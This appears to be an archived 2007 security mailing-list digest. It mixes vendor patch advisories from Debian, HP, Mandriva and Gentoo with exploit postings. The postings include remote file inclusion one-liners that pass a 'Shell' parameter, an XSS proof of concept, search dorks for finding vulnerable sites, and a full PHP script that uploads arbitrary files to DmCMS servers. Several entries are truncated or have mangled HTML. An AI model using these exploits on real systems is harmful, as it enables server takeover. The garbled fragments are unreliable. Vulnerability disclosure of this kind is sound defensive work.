Post Revolution Remote File Inclusion

[InyeXion]

~~
  Post Revolution Remote File Inclusion
~~
  Affected Software .: Post Revolution 6.6 / 7.0 
Release Candidate 2
  Download..: http://www.fabio.com.ar/postrev/
  Risk ..: high  
  Date .: 25/3/2007
  Found by ..: InyeXion 
 
  Contact ...: InyeXion[at]gmail.com
  Web .: Www.InyeXion.com.ar
   
~~

 Affected File: 
   
/common.php
/themes/default/preview_post_completo.php

 Vulnerable Code:

/common.php

Line [10]   include 
($dir."themes/".$config_data["template"]."/encabezado.php");
Line [16]   include ($dir."themes/".$config_data["template"]."/cuerpo.php");
Line [22]   include ($dir."themes/".$config_data["template"]."/pie.php");
Line [37]   include 
($dir."themes/".$config_data["template"]."/menu_principal.php");
Line [49] include 
($dir."themes/".$config_data["template"]."/error.php");
Line [129]  include 
($dir."themes/".$config_data["template"]."/login_form.php");
Line [135]  include ($dir."themes/".$config_data["template"]."/logout.php");
Line [174]  include ($dir."language/".$config_data["lang"].".php");
Line [272]  include ($dir."language/".$config_data["lang"].".php");
Line [282]  include 
($dir."themes/".$config_data["template"]."/seccion.php");
Line [360]  include ($dir."language/".$config_data["lang"].".php");
Line [446]  include ($dir."themes/".$config_data["template"]."/post.php");
Line [460]  include ($dir."language/".$config_data["lang"].".php");
Line [543]  include 
($dir."themes/".$config_data["template"]."/archivo_noticias.php");
Line [549]  include 
($dir."themes/".$config_data["template"]."/cuerpo_archivo.php");
Line [570]  include ($dir."language/".$config_data["lang"].".php");
Line [628]  include 
($dir."themes/".$config_data["template"]."/post_completo.php");
Line [641]  include ($dir."language/".$config_data["lang"].".php");
Line [661]  include ($dir."language/".$config_data["lang"].".php");
Line [680]  include 
($dir."themes/".$config_data["template"]."/posts_usuario.php");
Line [692]  include ($dir."language/".$config_data["lang"].".php");
Line [715]  include 
($dir."themes/".$config_data["template"]."/comment_encabezado.php");
Line [750]  include 
($dir."themes/".$config_data["template"]."/comment.php");
Line [770]  include 
($dir."themes/".$config_data["template"]."/comment_form.php");
Line [776]  include ($dir."themes/".$config_data["template"]."/info.php");
Line [782]  include ($dir."themes/".$config_data["template"]."/info.php");
Line [1054] include ($dir."language/".$config_data["lang"].".php");
Line [1106] include 
($dir."themes/".$config_data["template"]."/encuesta_head.php");
Line [1124] include 
($dir."themes/".$config_data["template"]."/encuesta_opc.php");
Line [1128] include 
($dir."themes/".$config_data["template"]."/encuesta_pie.php");
Line [1159] include 
($dir."themes/".$config_data["template"]."/encuesta_head_ver.php");
Line [1180] include 
($dir."themes/".$config_data["template"]."/encuesta_opc_ver.php");
Line [1183] include 
($dir."themes/".$config_data["template"]."/encuesta_pie_ver.php");
Line [1231] include 
($dir."themes/".$config_data["template"]."/encuestas_anteriores.php");
Line [1242] include 
($dir."themes/".$config_data["template"]."/tagmenu.php");
Line [1297] include 
($dir."themes/".$config_data["template"]."/tagpost.php");
Line [1310] include ($dir."language/".$config_data["lang"].".php");
Line [1482] include ($dir."language/".$config_data["lang"].".php");
Line [1506] include 
($dir."themes/".$config_data["template"]."/categoria_enlace.php");
Line [1521] include 
($dir."themes/".$config_data["template"]."/enlacefila.php");
Line [1570] include ($dir."config.php");
Line [1676] include ($dir."language/".$config_data["lang"].".php");
Line [1678] include ($dir."themes/".$config_data["template"]."/buscar.php");
Line [1685] include ($dir."language/".$config_data["lang"].".php");
Line [1723] include 
($dir."themes/".$config_data["template"]."/resultado.php");
Line [1730] include ($dir."language/".$config_data["lang"].".php");
Line [1766] include 
($dir."themes/".$config_data["template"]."/busq-dato.php");
Line [1772] include 
($dir."themes/".$config_data["template"]."/busq-resultado.php");
Line [1778] inc

c-arbre <= Multiple Remote File Include Vulnerablitiy

[Mohandko]

# c-arbre <= Multiple Remote File Include Vulnerablitiy
# D.Script: 
http://fresh.t-systems-sfr.com/unix/src/www/c-arbre_0.6PR7_full.tar.gz
# Discovered by: MoHaNdKo-=-=-> [EMAIL PROTECTED]
# Homepage: http://www.MoHaNdKo.cOm
# Exploit:[Path]/c-arbre/espaces/communiques/annotations.php?root_path=Shell
# Greetz To: Tryag-Team & AsbMay's Group & Xp10 TeAm & CiTy GhOsTs TeAm

[SECURITY] [DSA 1279-1] New webcalendar packages fix cross-site scripting

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1279-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
April 22nd, 2007http://www.debian.org/security/faq
- --

Package: webcalendar
Vulnerability  : missing input sanitising
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2006-6669

It was discovered that WebCalendar, a PHP-based calendar application,
performs insufficient sanitising in the exports handler, which allows
injection of web script.

For the old stable distribution (sarge) this problem has been fixed in
version 0.9.45-4sarge7.

The stable distribution (etch) no longer contains WebCalendar packages.

For the unstable distribution (sid) this problem has been fixed in
version 1.0.5-2.

We recommend that you upgrade your webcalendar package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge7.dsc
  Size/MD5 checksum:  608 0c12e6c6307413350af264045a4df964

http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge7.diff.gz
  Size/MD5 checksum:13013 ced8d9c6f7d52a42c3297a685547cb06

http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45.orig.tar.gz
  Size/MD5 checksum:   612360 a6a66dc54cd293429b604fe6da7633a6

  Architecture independent components:


http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge7_all.deb
  Size/MD5 checksum:   629712 39fca1d949580d18e1e293a1c181b1a8

  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show ' and http://packages.debian.org/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGK3fhXm3vHE4uyloRAiHOAJ0QtrQgIsQBKm6qCmWWfBwRWG6G0gCffVxw
MuZS2n/wJveeDEn8ZJUPrv4=
=CkBR
-END PGP SIGNATURE-

Ripe Website Manager (<= 0.8.4) - SQL Injection Vulnerability and Cross-Site Scripting Exploit

[john]

Ripe Website Manager (<= 0.8.4) - Cross-Site Scripting and SQL 
Injection Exploit

Ripe Website Manager (<= 0.8.4) - Cross-Site 
Scripting and SQL Injection Exploitdiscovered by http://john-martinelli.com";>John MartinelliGoogle d0rk: http://www.google.com/search?q=%22Powered+by+Ripe+Website+Manager>"Powered
 by Ripe Website Manager"


http://www.example.com/path/contact/index.php"; method="post">

[security bulletin] HPSBUX02183 SSRT061243 rev.1 - HP-UX sendmail, Remote Denial of Service (DoS)

[security-alert]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00841370
Version: 1

HPSBUX02183 SSRT061243 rev.1 - HP-UX sendmail, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2007-04-16
Last Updated: 2007-04-17

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY

A potential security vulnerability has been identified with HP-UX running 
sendmail. This vulnerability could allow a remote user to cause a Denial of 
Service (DoS).

References: none

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP-UX B.11.00 (obsolete) running sendmail 8.9.3 or sendmail 8.11.1,
HP-UX B.11.11 running sendmail 8.9.3 or sendmail 8.11.1,
HP-UX B.11.23 running sendmail 8.11.1.

BACKGROUND

To determine if a system has an affected version, search the output of "swlist 
-a revision -l fileset" for an affected fileset. Then determine if the 
recommended patch or update is installed.

AFFECTED VERSIONS

For sendmail 8.11.1
HP-UX B.11.23
===
InternetSrvcs.INETSVCS2-RUN
action: install PHNE_35485 or subsequent

HP-UX B.11.11
===
SMAIL-UPGRADE.INETSVCS-SMAIL
action: install revision B.11.11.02.004 or subsequent

HP-UX B.11.00
===
SMAIL-811.INETSVCS-SMAIL
action: remove (use sendmail 8.9.3) or upgrade to HP-UX B.11.11

For sendmail 8.9.3
HP-UX B.11.11
===
InternetSrvcs.INETSVCS-RUN
action: install PHNE_35484 or subsequent

For sendmail 8.9.3
HP-UX B.11.00
=
InternetSrvcs.INETSVCS-RUN
action: install PHNE_35483 or subsequent

END AFFECTED VERSIONS

Note:
sendmail 8.13.3 currently available from http://software.hp.com does not 
exhibit this DoS issue.
sendmail 8.11.1 is no longer available from http://software.hp.com for HP-UX 
B.11.11; customers are encouraged to upgrade to sendmail 8.13.3.

RESOLUTION

HP has made the following patches available to resolve the issue.
The patches are available from http://itrc.hp.com

For sendmail 8.11.1, HP-UX B.11.23
Install: PHNE_35485 or subsequent
sendmail -bs banner: Sendmail 8.11.1 (Revision 1.10)/8.11.1
what(1) string: version.c 8.11.1 (Berkeley) - 01 December 2006 (PHNE_35485)

For sendmail 8.11.1, HP-UX B.11.11
Please write to [EMAIL PROTECTED] for more information.

For sendmail 8.11.1, HP-UX B.11.00
Use sendmail 8.9.3 or upgrade to B.11.11 or subsequent. There will be no update 
to sendmail 8.11.1 for HP-UX B.11.00 to resolve the vulnerability.

For sendmail 8.9.3, HP-UX B.11.11
Install: PHNE_35484 or subsequent
sendmail -bs banner: Sendmail 8.9.3 (Revision 1.10)/8.9.3
what(1) string: version.c 8.9.3 (Berkeley) 01 December 2006 (PHNE_35484)

For sendmail 8.9.3, HP-UX B.11.00
Install: PHNE_35483 or subsequent
sendmail -bs banner: Sendmail 8.9.3 (Revision 1.10)/8.9.3
what(1) string: version.c 8.9.3 (Berkeley) 01 December 2006 (PHNE_35483)

MANUAL ACTIONS: Yes - NonUpdate
HP-UX B.11.11 sendmail 8.11.1 - Write to [EMAIL PROTECTED]
HP-UX B.11.00 sendmail 8.11.1 - Use sendmail 8.9.3 or upgrade to HP-UX B.11.11 
or subsequent
HP-UX B.11.23 sendmail 8.11.1 - No manual actions
HP-UX B.11.11 sendmail 8.9.3 - No manual actions
HP-UX B.11.00 sendmail 8.9.3 - No manual actions

PRODUCT SPECIFIC INFORMATION

HP_UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all 
HP-issued Security Bulletins to provide a subset of recommended actions that 
potentially affect a specific HP-UX system. For more information:
http://software.hp.com/portal/swdepot/displayProductInfo.do?_productNumber=B6834AA

HISTORY:
Version: 1 (rev.1) - 16 April 2007 Initial release

Third Party Security Patches: Third party security patches which are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: [EMAIL PROTECTED]
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED]
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
  - verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subsc

phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit

[john]

phpMySpace Gold (v8.10) - Blind SQL/XPath Injection 
Exploit

phpMySpace Gold (v8.10) - Blind SQL/XPath 
Injection Exploitdiscovered by http://john-martinelli.com";>John MartinelliGoogle d0rk: http://www.google.com/search?q=+%22Powered+by+phpMySpace+Gold+8.10%22";>"Powered
 by Ripe Website Manager"


http://www.example.com/path/modules/news/article.php"; 
method="get">

3proxy 0.5.3i bugfix release

[Vladimir Dubrovin]

Background:

3proxy  [1]  is  universal multifunctional free open source proxy server
with  multiple  protocols supports (HTTP/HTTPS/Ftp over HTTP, POP3, FTP,
SOCKS 4/4.5/5, UDP and TCP portmapping, DNS proxy) with ACL-based access
control,  proxy  chaining,  traffic  accounting,  bandwidth  limitation,
configurable logging, etc for Windows/Linux/Unix.

Description:

On  April,  14 3proxy development team released urgent 0.5.3h update [2]
for  3proxy,  fixing  stack-based  buffer overflow vulnerability in both
Windows  and  Linux/Unix 3proxy versions 0.5-0.5.3g and 0.6-devel branch
before  date  of  the  fix  (CVE-2007-2031) [3]. Vulnerability was found
during bug report investigation. Binary 3proxy 0.6-devel distribution is
compiled with stack protection.

On  April, 20 reviewed 0.5.3i version [2] of 3proxy was released, fixing
few  security  unrelated  functionality issues with bandwidth limitation
and traffic limitation.

Update information:

All  3proxy  users  are  advised to update to latest 0.5.3i (or at least
0.5.3h) or 0.6-devel version [4].

Please   subscribe  to  three-proxy-announce  mailing  list  [5]  to  be
immediately informed on new 3proxy releases.

Announce:

0.6  version  of  3proxy  introduces  extended  access control / traffic
control  features and plugins/extensions support. Windows authentication
is in beta testing, regular expressions filtering/rewriting plugin is in
alpha  testing,  LDAP  plugin  is  in development, antiviral plugins are
planned for development. We invite port maintainers, developers and beta
testers.

References:

[1] 3proxy official homepage
http://3proxy.ru/
[2] 3proxy 0.5.3i Changelog
http://3proxy.ru/0.5.3i/Changelog.txt
[3] CVE-2007-2031
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2031
[4] 3proxy download page
http://3proxy.ru/download/
[5] 3proxy announcements mailing list at Sourceforge
https://lists.sourceforge.net/lists/listinfo/three-proxy-announce

TJSChat Version 0.95 Cross Site Scripting

[the_3dit0r]

"""
"""  :: :::     """
"""   ::   :: ::  :   ::"""
""" ::   :: : :     """
"""::  ::   ::: ::: :: :: ::  ::::  """
"""  ::  :: :: :  : : ::   ::   """
""" """
"""
   Xmor$ Security Vulnerability Research TM


# Tilte: TJSChat Version 0.95 Cross Site Scripting 


# Author..: [the_Edit0r]
# HomePage: [Www.XmorS-SEcurity.coM]
[Www.XmorS.coM]
# Location ...: [Iran]
# Software ...: [TJSChat] 
# Site Script : [http://www.toutjavascript.com]
# We ArE .: [ 
Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ]




--- proof Of Concept ---


 www.example.com/[path]/you.php?user=alert(/the_Edit0r/);


---


# Contact me : the_3dit0r[at]Yahoo[dot]coM

# [XmorS-SEcurity.coM]

acvsws_php5_v1.0 <= Multiple Remote File Include Vulnerablitiy

[Mohandko]

# acvsws_php5_v1.0 <= Multiple Remote File Include Vulnerablitiy
# D.Script: http://www.acvsnet.net/DNN
ACVS/Portals/0/_Commun/WebServices/acvsws_php5_v1.0_release.zip/
# Discovered by: MoHaNdKo-=-=-> [EMAIL PROTECTED]
# Homepage: http://www.MoHaNdKo.cOm
# Exploit:[Path]/inc_ACVS/SOAP/Transport.php?CheminInclude=Shell
# Greetz To: Tryag-Team & AsbMay's Group & Xp10 TeAm & CiTy GhOsTs TeAm
#Greetz To: aLL mY Friends

RE: Yet another SQL injection framework

[Greg Merideth]

The script simply hides or shows the link on the page which points to
sf.

http://sourceforge.net/projects/injection-fwk/

-Original Message-
From: Nick Boyce [mailto:[EMAIL PROTECTED] 
Sent: Friday, April 20, 2007 9:13 AM
To: bugtraq@securityfocus.com
Cc: Guillermo Marro
Subject: Re: Yet another SQL injection framework

On 4/19/07, Guillermo Marro <[EMAIL PROTECTED]> wrote:

> FG-Injector is a free tool that leverages the pentester's work by
> facilitating the exploitation of SQL Injection vulnerabilities.
[...]
> Get both, sources and a windows binary from:
> http://www.flowgate.net/?lang=en&seccion=herramientas

Um .. when I click on the link for "FG-Injector" at the above site
with my NoScript-enabled Firefox all I see is what looks like a server
log entry for my interaction :

aaa.bbb.ccc.ddd Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3 /injector

This is presumably because the actual links are infested with Javascript
:

onClick="javascript:showStaff('injector')"

Since I'm following links in an email on a security mailing list I'm
disinclined to disable NoScript - any chance you can convert the links
into normal HREFs ?

I could go and grab your Javascript library and figure out what
'showStaff' does ... but I'd rather just click on an old-school link.

Cheers
Nick Boyce
-- 
I speak to all bloggers everywhere: just shut up for a second and let
me think, will you?
 -- blog comment at http://it-gears.blogspot.com/   :-)

DmCMS Shell Uploading

[security]

Hello
Title : DmCMS Shell Upload
Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : [EMAIL PROTECTED]

File ..
includes/upload_file.php
After Giving Some conditions will allow you to upload any file you want
the exploit here is the proof ..

exploit :

#!/usr/bin/php -q -d short_open_tag=on
 */
/* site: http://www.soqor.net */');
if ($argc<4) {
print_r('
/* -- */
/* Usage: php '.$argv[0].' host path topath
/* Example:   */
/*php '.$argv[0].' localhost /dmcms/ ../media/
/**/
');
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
 Function get_page($url)
 {

  if(function_exists("file_get_contents"))
  {

   $contents = file_get_contents($url);

  }
  else
  {
  $fp=fopen("$url","r");
  while($line=fread($fp,1024))
  {
   $contents=$contents.$line;
  }


  }
   return $contents;
 }

function connect($packet)
{
  global $host, $port, $html;
$con=fsockopen(gethostbyname($host),$port);
if (!$con)
{
  echo '[-] Error - No response from '.$host.':'.$port; die;
}
  fputs($con,$packet);
$html='';
while ((!feof($con)) or 
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  $html.=fread($con,1);
}
  GLOBAL $html;
  fclose($con);
}

$i=0;
$data="";

function add_data($name,$value,$type="no",$filename)
{
 GLOBAL $data,$i;
if($type=="file")
{
$data.="-7d62702f250530
Content-Disposition: form-data; name=\"$filename\"; filename=\"$name\";
Content-Type: text/plain

$value
";
}
elseif($type=="init")
{

$data.="-7d62702f250530--";

}
elseif($type=="clean")
{
$data="";
}
else
{
$data.="-7d62702f250530
Content-Disposition: form-data; name=\"$name\";
Content-Type: text/plain

$value
";
}


}

$host=$argv[1];
$path=$argv[2];
$default_path=$argv[3];
$port=80;

$cmd=urlencode($cmd);

$p='http://'.$host.':'.$port.$path;

Echo "\n[+] Trying to Upload File";

$cookie="Master=HACKERS20%PAL";
$contents='';

add_data("empty.php","","file","File1");
add_data("soqor.php",$contents,"file","File2");
add_data("soqor.php",$contents,"file","File3");
add_data('','',"init");

$packet="POST ".$p."includes/upload_file.php?default_path=$default_path 
HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."ok.php?do=act\r\n";;
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: multipart/form-data; 
boundary=---7d62702f250530\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 
SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: ".$cookie."\r\n\r\n";
$packet.=$data;
connect($packet);

if (!eregi($default_path,$html))
{
echo"\n/* [+] Successfully Exploited";
}
   echo ("\n/* Visit us : WwW.SoQoR.NeT   
*/\n/**/");
?>
#WwW.SoQoR.NeT

[ MDKSA-2007:093 ] - Updated zziplib packages fix vulnerability

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:093
 http://www.mandriva.com/security/
 ___
 
 Package : zziplib
 Date: April 23, 2007
 Affected: Corporate 4.0
 ___
 
 Problem Description:
 
 A stack-based buffer overflow in the ZZIPlib library could allow
 user-assisted remote attackers to cause an application crash (DoS)
 or execute arbitrary code via a long filename.
 
 Updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1614
 ___
 
 Updated Packages:
 
 Corporate 4.0:
 a0ac9e92d0beee7726739000791e6748  
corporate/4.0/i586/zziplib0-0.13.33-4.1.20060mlcs4.i586.rpm
 1518189e431ccd97aa491a4591de80d6  
corporate/4.0/i586/zziplib0-devel-0.13.33-4.1.20060mlcs4.i586.rpm 
 c17957866cab01574723960484e792a9  
corporate/4.0/SRPMS/zziplib-0.13.33-4.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 91e3feceacc5f9fd7629525d1be8b951  
corporate/4.0/x86_64/zziplib0-0.13.33-4.1.20060mlcs4.x86_64.rpm
 641b79b72b74306264f8cc40b89ecf68  
corporate/4.0/x86_64/zziplib0-devel-0.13.33-4.1.20060mlcs4.x86_64.rpm 
 c17957866cab01574723960484e792a9  
corporate/4.0/SRPMS/zziplib-0.13.33-4.1.20060mlcs4.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFGLO2pmqjQ0CJFipgRAh2lAJsFOiiEm3c5n10Jlbdy2D2FOGXq9ACg7YDJ
/HL9x4tONQFyI8wRo+wDE3M=
=jMiN
-END PGP SIGNATURE-

[ GLSA 200704-20 ] NAS: Multiple vulnerabilities

[Raphael Marichez]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200704-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: NAS: Multiple vulnerabilities
  Date: April 23, 2007
  Bugs: #171428
ID: 200704-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


The Network Audio System is vulnerable to a buffer overflow that could
result in the execution of arbitrary code with root privileges.

Background
==

NAS is a network transparent, client/server audio transport system.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  media-libs/nas   < 1.8b   >= 1.8b

Description
===

Luigi Auriemma has discovered multiple vulnerabilities in NAS, some of
which include a buffer overflow in the function accept_att_local(), an
integer overflow in the function ProcAuWriteElement(), and a null
pointer error in the function ReadRequestFromClient().

Impact
==

An attacker having access to the NAS daemon could send an overly long
slave name to the server, leading to the execution of arbitrary code
with root privileges. A remote attacker could also send a specially
crafted packet containing an invalid client ID, which would crash the
server and result in a Denial of Service.

Workaround
==

There is no known workaround at this time.

Resolution
==

All NAS users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/nas-1.8b"

References
==

  [ 1 ] CVE-2007-1543
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1543
  [ 2 ] CVE-2007-1544
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1544
  [ 3 ] CVE-2007-1545
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1545
  [ 4 ] CVE-2007-1546
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1546
  [ 5 ] CVE-2007-1547
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1547

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-20.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


pgpYftazAFgAb.pgp
Description: PGP signature

[ MDKSA-2007:092 ] - Updated freeradius packages fix vulnerability

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:092
 http://www.mandriva.com/security/
 ___
 
 Package : freeradius
 Date: April 23, 2007
 Affected: Corporate 4.0
 ___
 
 Problem Description:
 
 Multiple buffer overflows were found in the FreeRADIUS package version
 1.0.4 and prior that could allow a remote attacker to cause a crash
 via the rlm_sqlcounter module (CVE-2005-4746).
 
 As well, an SQL injection vulnerability was also found in the
 rlm_sqlcounter that could allow a remote attacker to execute arbitrary
 SQL commands via unknown attack vectors (CVE-2005-4745).
 
 Updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4745
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4746
 ___
 
 Updated Packages:
 
 Corporate 4.0:
 523055be4399355565d6175d7df13ca7  
corporate/4.0/i586/freeradius-1.0.4-2.4.20060mlcs4.i586.rpm
 4e000a3cb2c8cb2f3359a961878a310a  
corporate/4.0/i586/libfreeradius1-1.0.4-2.4.20060mlcs4.i586.rpm
 3e9f17beada7d6d10235c6db8156a77a  
corporate/4.0/i586/libfreeradius1-devel-1.0.4-2.4.20060mlcs4.i586.rpm
 0429cf3dda93772e358fc34a1d5cb1f8  
corporate/4.0/i586/libfreeradius1-krb5-1.0.4-2.4.20060mlcs4.i586.rpm
 216c28ffac0b1d03a493d5548556be2d  
corporate/4.0/i586/libfreeradius1-ldap-1.0.4-2.4.20060mlcs4.i586.rpm
 07ebd1dbb7d4f1a71253ebab163f1dd8  
corporate/4.0/i586/libfreeradius1-mysql-1.0.4-2.4.20060mlcs4.i586.rpm
 9b3586d1c94b6cf650723a095db846d7  
corporate/4.0/i586/libfreeradius1-postgresql-1.0.4-2.4.20060mlcs4.i586.rpm
 10b8fb70adfc1a641b2f63c041db1069  
corporate/4.0/i586/libfreeradius1-unixODBC-1.0.4-2.4.20060mlcs4.i586.rpm 
 0fb72186b61687df8dedff8d874fbb86  
corporate/4.0/SRPMS/freeradius-1.0.4-2.4.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 435d07e3a5878cb0fd27e02fbee702df  
corporate/4.0/x86_64/freeradius-1.0.4-2.4.20060mlcs4.x86_64.rpm
 f57c46977fbd86772852f21d138605de  
corporate/4.0/x86_64/lib64freeradius1-1.0.4-2.4.20060mlcs4.x86_64.rpm
 bcc4dc4cac18ed3d034483de311fe240  
corporate/4.0/x86_64/lib64freeradius1-devel-1.0.4-2.4.20060mlcs4.x86_64.rpm
 646309915542dad2b6e68ff130fead11  
corporate/4.0/x86_64/lib64freeradius1-krb5-1.0.4-2.4.20060mlcs4.x86_64.rpm
 039290c0f429ff9f5ecf1ce13b17765f  
corporate/4.0/x86_64/lib64freeradius1-ldap-1.0.4-2.4.20060mlcs4.x86_64.rpm
 0ca4c838dae5657c3f902ed2234a7286  
corporate/4.0/x86_64/lib64freeradius1-mysql-1.0.4-2.4.20060mlcs4.x86_64.rpm
 a48ad352690163f2fd90f022007bcd7a  
corporate/4.0/x86_64/lib64freeradius1-postgresql-1.0.4-2.4.20060mlcs4.x86_64.rpm
 e8aea2d0c9a45462ef30ab0113b62164  
corporate/4.0/x86_64/lib64freeradius1-unixODBC-1.0.4-2.4.20060mlcs4.x86_64.rpm 
 0fb72186b61687df8dedff8d874fbb86  
corporate/4.0/SRPMS/freeradius-1.0.4-2.4.20060mlcs4.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFGLO1nmqjQ0CJFipgRAsFaAJ9co3OlDWZ/TbgBhXObcQQisfeV7wCglV83
4mS7Fi8Nr26rU13+J4dlRxM=
=UflY
-END PGP SIGNATURE-

FLEA-2007-0012-1: madwifi

[Foresight Linux Essential Announcement Service]

Foresight Linux Essential Advisory: 2007-0012-1
Published: 2007-04-22

Rating: Moderate

Updated Versions:

madwifi=/[EMAIL PROTECTED]:devel//fl:desktop//[EMAIL 
PROTECTED]:1-devel//1/0.9.3-0.0.0.1-1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.2.1-0.2-1

References:
https://issues.foresightlinux.org/browse/FL-263
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7177
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7178
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7179
